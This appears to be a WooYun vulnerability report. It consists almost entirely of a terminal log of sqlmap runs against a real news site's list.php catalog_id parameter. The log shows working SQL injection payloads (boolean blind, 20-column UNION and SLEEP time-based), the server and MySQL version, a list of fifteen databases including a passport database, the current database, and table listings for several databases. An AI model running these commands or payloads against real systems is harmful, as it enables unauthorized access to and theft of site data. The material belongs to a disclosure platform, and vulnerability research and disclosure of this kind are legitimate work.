WooYun.org

root@root:~# sqlmap -u http://zhuanti.inewsweek.cn/list.php?catalog_id=237
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 14:57:35
[14:57:35] [INFO] testing connection to the target URL
[14:57:36] [INFO] testing if the target URL is stable. This can take a couple of seconds
[14:57:37] [INFO] target URL is stable
[14:57:37] [INFO] testing if GET parameter 'catalog_id' is dynamic
[14:57:38] [INFO] confirming that GET parameter 'catalog_id' is dynamic
[14:57:38] [INFO] GET parameter 'catalog_id' is dynamic
[14:57:39] [WARNING] reflective value(s) found and filtering out
[14:57:39] [INFO] heuristic (basic) test shows that GET parameter 'catalog_id' might be injectable
[14:57:39] [INFO] testing for SQL injection on GET parameter 'catalog_id'
[14:57:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:57:40] [INFO] GET parameter 'catalog_id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[14:57:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[14:57:43] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:57:43] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[14:57:43] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[14:57:43] [INFO] testing 'MySQL inline queries'
[14:57:43] [INFO] testing 'PostgreSQL inline queries'
[14:57:43] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[14:57:44] [INFO] testing 'Oracle inline queries'
[14:57:44] [INFO] testing 'SQLite inline queries'
[14:57:44] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:57:44] [WARNING] time-based comparison requires larger statistical model, please wait..........
[14:57:47] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[14:57:48] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[14:57:48] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[14:58:48] [INFO] GET parameter 'catalog_id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable 
[14:58:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[14:58:48] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[14:58:49] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[14:58:51] [INFO] target URL appears to have 20 columns in query
[14:58:57] [INFO] GET parameter 'catalog_id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[14:58:57] [WARNING] parameter length constraint mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'catalog_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 50 HTTP(s) requests:
---
Place: GET
Parameter: catalog_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: catalog_id=237) AND 3516=3516 AND (7269=7269
    Type: UNION query
    Title: MySQL UNION query (NULL) - 20 columns
    Payload: catalog_id=237) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716f706a71,0x797371675264644b6965,0x7162767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: catalog_id=237) AND SLEEP(5) AND (5951=5951
---
[14:58:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux SuSE
web application technology: Apache 2.2.12
back-end DBMS: MySQL 5.0.11
[14:58:59] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/zhuanti.inewsweek.cn'
[*] shutting down at 14:58:59
root@root:~# sqlmap -u http://zhuanti.inewsweek.cn/list.php?catalog_id=237 --dnsUsage: python sqlmap [options]
sqlmap: error: --dns-domain option requires an argument
[*] shutting down at 14:59:02
root@root:~# sqlmap -u http://zhuanti.inewsweek.cn/list.php?catalog_id=237 --dbs 
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 14:59:05
[14:59:05] [INFO] resuming back-end DBMS 'mysql' 
[14:59:05] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: catalog_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: catalog_id=237) AND 3516=3516 AND (7269=7269
    Type: UNION query
    Title: MySQL UNION query (NULL) - 20 columns
    Payload: catalog_id=237) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716f706a71,0x797371675264644b6965,0x7162767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: catalog_id=237) AND SLEEP(5) AND (5951=5951
---
[14:59:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux SuSE
web application technology: Apache 2.2.12
back-end DBMS: MySQL 5.0.11
[14:59:05] [INFO] fetching database names
[14:59:06] [WARNING] reflective value(s) found and filtering out
available databases [15]:
[*] cnw_bbs
[*] cnw_eng
[*] cnw_ibbs
[*] cnw_iphoto
[*] cnw_other
[*] cnw_passport
[*] cnw_pld
[*] cnw_survey
[*] cnw_total
[*] cnw_web
[*] cnw_web_new
[*] cnw_zhuanti
[*] information_schema
[*] mysql
[*] test
[14:59:06] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/zhuanti.inewsweek.cn'
[*] shutting down at 14:59:06
root@root:~# sqlmap -u http://zhuanti.inewsweek.cn/list.php?catalog_id=237 --current-db
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 14:59:14
[14:59:14] [INFO] resuming back-end DBMS 'mysql' 
[14:59:16] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: catalog_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: catalog_id=237) AND 3516=3516 AND (7269=7269
    Type: UNION query
    Title: MySQL UNION query (NULL) - 20 columns
    Payload: catalog_id=237) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716f706a71,0x797371675264644b6965,0x7162767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: catalog_id=237) AND SLEEP(5) AND (5951=5951
---
[14:59:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux SuSE
web application technology: Apache 2.2.12
back-end DBMS: MySQL 5.0.11
[14:59:17] [INFO] fetching current database
[14:59:17] [WARNING] reflective value(s) found and filtering out
current database:    'cnw_web_new'
[14:59:17] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/zhuanti.inewsweek.cn'
[*] shutting down at 14:59:17
root@root:~# sqlmap -u http://zhuanti.inewsweek.cn/list.php?catalog_id=237 --tables -D cnw_web_new
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 14:59:30
[14:59:30] [INFO] resuming back-end DBMS 'mysql' 
[14:59:30] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: catalog_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: catalog_id=237) AND 3516=3516 AND (7269=7269
    Type: UNION query
    Title: MySQL UNION query (NULL) - 20 columns
    Payload: catalog_id=237) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716f706a71,0x797371675264644b6965,0x7162767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: catalog_id=237) AND SLEEP(5) AND (5951=5951
---
[14:59:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux SuSE
web application technology: Apache 2.2.12
back-end DBMS: MySQL 5.0.11
[14:59:31] [INFO] fetching tables for database: 'cnw_web_new'
[14:59:32] [WARNING] reflective value(s) found and filtering out
Database: cnw_web_new
[27 tables]
+-------------------------------------+
| catalog                             |
| catalog_magazine                    |
| catalog_promissory                  |
| comment                             |
| comment_agree_and_oppose_log        |
| content                             |
| edit_story                          |
| edit_story_content_and_author_cross |
| famous_magazine                     |
| famous_magazine_digest              |
| focus_photo                         |
| jiayuan                             |
| keyword_cross                       |
| keywords                            |
| magazine                            |
| magazine_content                    |
| magazine_content_and_author_cross   |
| photo_album                         |
| photo_photo                         |
| profundity_china_reports            |
| profundity_china_reports_lable      |
| profundity_china_topics             |
| system_push                         |
| template                            |
| video                               |
| weibo_push                          |
| zhuanti_content                     |
+-------------------------------------+
[14:59:32] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/zhuanti.inewsweek.cn'
[*] shutting down at 14:59:32
root@root:~# sqlmap -u http://zhuanti.inewsweek.cn/list.php?catalog_id=237 --tables -D cnw_bbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:00:07
[15:00:07] [INFO] resuming back-end DBMS 'mysql' 
[15:00:07] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: catalog_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: catalog_id=237) AND 3516=3516 AND (7269=7269
    Type: UNION query
    Title: MySQL UNION query (NULL) - 20 columns
    Payload: catalog_id=237) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716f706a71,0x797371675264644b6965,0x7162767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: catalog_id=237) AND SLEEP(5) AND (5951=5951
---
[15:00:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux SuSE
web application technology: Apache 2.2.12
back-end DBMS: MySQL 5.0.11
[15:00:08] [INFO] fetching tables for database: 'cnw_bbs'
[15:00:08] [WARNING] reflective value(s) found and filtering out
Database: cnw_bbs
[4 tables]
+------------+
| bbs_up_log |
| forums     |
| posts      |
| topics     |
+------------+
[15:00:08] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/zhuanti.inewsweek.cn'
[*] shutting down at 15:00:08
root@root:~# sqlmap -u http://zhuanti.inewsweek.cn/list.php?catalog_id=237 --tables -D cnw_ibbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:00:27
[15:00:28] [INFO] resuming back-end DBMS 'mysql' 
[15:00:30] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: catalog_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: catalog_id=237) AND 3516=3516 AND (7269=7269
    Type: UNION query
    Title: MySQL UNION query (NULL) - 20 columns
    Payload: catalog_id=237) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716f706a71,0x797371675264644b6965,0x7162767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: catalog_id=237) AND SLEEP(5) AND (5951=5951
---
[15:00:30] [INFO] the back-end DBMS is MySQL
web server operating system: Linux SuSE
web application technology: Apache 2.2.12
back-end DBMS: MySQL 5.0.11
[15:00:30] [INFO] fetching tables for database: 'cnw_ibbs'
[15:00:30] [WARNING] reflective value(s) found and filtering out
Database: cnw_ibbs
[7 tables]
+------------------+
| position         |
| message          |
| permission       |
| posts            |
| topic_type       |
| topics           |
| user_online_list |
+------------------+
[15:00:30] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/zhuanti.inewsweek.cn'
[*] shutting down at 15:00:30
root@root:~#